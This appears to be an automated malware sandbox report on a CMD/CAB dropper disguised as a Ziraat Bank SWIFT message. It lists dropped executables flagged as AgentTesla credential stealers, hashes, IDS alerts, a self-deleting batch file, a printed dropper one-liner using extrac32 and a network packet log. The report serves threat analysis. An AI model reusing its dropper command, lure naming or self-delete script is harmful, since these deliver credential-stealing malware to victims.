                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):250368
                                                                                                                              Entropy (8bit):5.008874766930935
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                                              MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                                              SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                                              SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                                              Malicious:true
                                                                                                                              Yara Hits:
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):231936
                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):164
                                                                                                                              Entropy (8bit):5.0274413878335125
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRI2USHoLfBT:hWKdbuoL923fJWAawDNe923fTXU5
                                                                                                                              MD5:333872A6A5F57D90FEF81984EF2DA7FD
                                                                                                                              SHA1:51CE51C029D0F5CE1F6F0B8B4E29535734DEDB90
                                                                                                                              SHA-256:FFC8C0DCBDF0C254AE2ADCDBB57860A603C9228879D7FA0301984077B315431C
                                                                                                                              SHA-512:0855BC90CB894941D3E520CA7B0A49814E26E213EA1558A6DF1AE99E30CB39617E0274D022A13704F366211BCCEAC22454342D4CEDAB06F61B8B044160367B49
                                                                                                                              Malicious:false
                                                                                                                              Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp9170.tmp.cmd" /f /q..
                                                                                                                              Process:C:\Windows\System32\extrac32.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1224192
                                                                                                                              Entropy (8bit):6.917641485036678
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:Trd1nILlwmOWmdsNMRyHfeKx2b9O0xOaHAgfctN:TraaxkOb9XxOaHAgfctN
                                                                                                                              MD5:86EE0E8789E9C11F707D056C4052292E
                                                                                                                              SHA1:E14A7C7C230EFEEC03D671A91ECE4EDE1799F899
                                                                                                                              SHA-256:A3992C7D83574EF92D815F6102721F33CFAE92461F518ACC4196A1EE5AD3EDE7
                                                                                                                              SHA-512:4A6A8DC4FB82483B8297BF4199CCCFD4A1C32CF52CDAD42EB0E015ABBA815A29BF3123D65BD8EA4E8C6EFC630B7D7DCB9EE192F141514C8BA48E52A47D7C88EF
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..........................P...................@...............................(......................................................................................T............................text............................... ..`.itext..|........................... ..`.data...P6... ...8..................@....bss.....6...`.......8...................idata...(.......*...8..............@....tls....4............b...................rdata...............b..............@..@.reloc...............d..............@..B.rsrc...............................@..@.............P......................@..@................................................................................................
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12320
                                                                                                                              Entropy (8bit):7.983703099277698
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:A9OoBqeFcfx4QcPQP73me8sDTFzaie/qXr+lIG+pKa:6BqTx4JKh8sDTF5eC8EKa
                                                                                                                              MD5:1E500715DF973C14FC9611D971E46833
                                                                                                                              SHA1:C0219B235E1971D25389D7E92FB755BDAFF1AD0B
                                                                                                                              SHA-256:20E9CA0E1C312C6F21E4BA946D950ECA33CD6116168088E7DC23DE2C03995EC2
                                                                                                                              SHA-512:673FC0F2483C842ECA0217239B531070AEAD817D4012158790EE3F861C33E70E346EC76AD06D619D2D3F45E56BE2870A4FB5ADEA786BB9FF1A0825DCE58130E4
                                                                                                                              Malicious:false
                                                                                                                              Preview:z.0<.\+.T..UE..'.H......s.b@D..c.._T]+.<.Wb....XG;.....".hk.k....M..}..,....W..8bAu.1>$P.nt.h...`...;.I.n.....V...0v..p.....A.w.n.f.~......q4~V.Y...1....1.B:x0....Qs..ld..h..F....:f.V.$.rU.l"@... ...}.R.!......O..WS}..........\}}.d&,.......*........TB...*V..3Q7.Vun.-+....X..?.>.....D.l....t@.....<.W..H(:.....J..i.6f......l.WD.ye.z.0`..|j:d/..}..C...hf.8....=.M.V^..8=PB...|>./..`...g>..5...dI..S...}.l...R.p....X...6...../@.=.......u.Q..S.lj....).A..V..Q..jW.;.d.rWgk.f......Z.......1..6..X;...Ec..0./...W.....B.4.(&.B.-B...O..Y.$...4L.j..:..-.#...D.^.......Wr.^bM+...Z:..\C..-.....6.........m..d..I0ay.O.R..N....E....,H.\q|~.4.d/7U......B...T..v.c..|....ZP..w.g.0^..B..Hy....1:..yY.xm.~.......V.@*C..... k..h....U.)?.#.:'M.=~z.. ..G..aK"..gK..Y..{..`.j.<..<..b.C..n..5.......g..Z..)....,...n..9AOk:.7D..<.-.5...L.....Z...h.E...L,.0..'=.a^].w .":[/.... . m...@.[.I.ZR....".....%e...F..`.......#...5..2(.=....!..#.f6....w...%.5Ds87m.....?.v
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):231936
                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Nov 13 14:28:13 2024, mtime=Wed Nov 13 14:28:13 2024, atime=Wed Nov 13 14:28:11 2024, length=231936, window=
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1794
                                                                                                                              Entropy (8bit):3.5117019448362465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8eHfCv8pJZjvhosr5UAis4FSnplwO4ZTqlEpm:8eHZFx9D4+plwZTqlk
                                                                                                                              MD5:8C0EB79D1C8EF66FE1B953FE515BB2B3
                                                                                                                              SHA1:7B08245E5020DE66885DB30A6F7A040BA2E2518A
                                                                                                                              SHA-256:995144F60963047873584B279F6DA1189E75916AA131CCD3BB9A7E440F203887
                                                                                                                              SHA-512:2BE4A3F1D96DB08F9658F9D5040CD02BAECEEC6A80FBD885B20CCED2ACDA96A8BC7731A8E43C9E01E2E608E226DECFDD34485329B8CEA9FC7B972B6A4530571B
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ........5.....5..../..5............................:..DG..Yr?.D..U..k0.&...&...... M......._..5.....5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlmY}{....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....mY.{..Roaming.@......DWSlmY.{....C.....................%Z..R.o.a.m.i.n.g.....T.1.....mY.{..ACCApi..>......mY.{mY.{....)........................A.C.C.A.p.i.....l.2.....mY.{ .TROJAN~1.EXE..P......mY.{mY.{....*.....................E.Q.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........(8.4.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):593
                                                                                                                              Entropy (8bit):4.614066514976001
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:qx/xTzP1eSbZ7u0wxDDDDDDDDjCaY56oOBtFaYAF0B0TB8NGNTI:+/xTzdp7u0wQak6faTFt8Nb
                                                                                                                              MD5:3C2E7C3DCEDEF27727CB436F66EEDD00
                                                                                                                              SHA1:99DE770CDC4770A3B9CC9D5B7AE1DC1CBD009819
                                                                                                                              SHA-256:59CE64750D41F8251A3DEC3249ECA743953791CF8E3AB12EE5243830FC7E3A99
                                                                                                                              SHA-512:5F07322D364C43C4A2E312FF00D895C591E2A6AD9F5273CA803D1AAF16317FF573D46169659D6E77C56A9FCC9557850D4DC813E9DA1EA582386401F779ACA523
                                                                                                                              Malicious:false
                                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12ae00 (1224192) (1 MB)....Total bytes written = 0x12b000 (1224704) (1 MB).......Operation completed successfully in 0.110 seconds.....
                                                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):66
                                                                                                                              Entropy (8bit):4.524640141725149
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                              MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                              SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                              SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                              SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                              Malicious:false
                                                                                                                              Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                              File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 38 datablocks, 0 compression
                                                                                                                              Entropy (8bit):6.9171694245444115
                                                                                                                              TrID:
                                                                                                                              • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                              File name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                                                              File size:1'224'635 bytes
                                                                                                                              MD5:20234d2431671991411222678e9620f5
                                                                                                                              SHA1:88924a49c162ca22ac9ec365a8743cd1647f4501
                                                                                                                              SHA256:4003e71429b746c43d34c5ef4e793675dad9d60c7cb63d9e0f8c4d70843faadc
                                                                                                                              SHA512:c417071ffb36a21f775ce060822f0b6f2f30235c14191b56ca7e33bf92d95e777d7b1a3c3e89c2935d099751215bd300170261863986c34733f76e1af69226e4
                                                                                                                              SSDEEP:24576:fvd1nMLlMSGWqRoNgR+vLqud2f9OwxSibskfYtx:fv2mlsif9zxSibskfYtx
                                                                                                                              TLSH:A045C0B7726140B6D4039A36ED0BEBD82838BA393F18A46727FE5F5C6D35696F804143
                                                                                                                              File Content Preview:MSCF............u.......................&.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                                              Icon Hash:9686878b929a9886
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-13T16:28:02.656064+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705198.252.105.91443TCP
                                                                                                                              2024-11-13T16:28:20.241005+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549709TCP
                                                                                                                              2024-11-13T16:28:59.061846+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549908TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 13, 2024 16:28:01.562320948 CET49704443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.562376976 CET44349704198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:01.562494993 CET49704443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.562669039 CET49704443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.562726974 CET44349704198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:01.562787056 CET49704443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.588752985 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.588810921 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:01.588882923 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.590188980 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:01.590204000 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.655973911 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.656064034 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.659718037 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.659729004 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.660017014 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.705463886 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.751339912 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.831747055 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.872745037 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.872771978 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.920754910 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.948836088 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.948848963 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.948882103 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.948896885 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.948913097 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.948965073 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:02.948980093 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:02.949004889 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.000785112 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.065411091 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065422058 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065448046 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065504074 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.065537930 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065543890 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.065545082 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065561056 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065574884 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.065579891 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.065592051 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.065619946 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.182384014 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.182394981 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.182495117 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.182518959 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.182526112 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.182574987 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.299516916 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.299542904 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.299637079 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.299658060 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.299705982 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.415884972 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.415920019 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.415957928 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.415987968 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.416012049 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.416027069 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.532656908 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.532704115 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.533000946 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.533000946 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.533025980 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.533081055 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.649812937 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.649931908 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.649965048 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.650011063 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.650029898 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.650058031 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.694019079 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.694070101 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.694140911 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.694161892 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.694186926 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.694202900 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.810906887 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.810949087 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.811006069 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.811042070 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.811091900 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.811125040 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.883706093 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.883730888 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.883904934 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:03.883934975 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:03.884037971 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.000184059 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.000211000 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.000314951 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.000338078 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.000375986 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.065732956 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.065764904 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.065865040 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.065881968 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.065922976 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.443898916 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.443926096 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.443979025 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.444047928 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.444075108 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.444108009 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.444147110 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.445363045 CET44349705198.252.105.91192.168.2.5
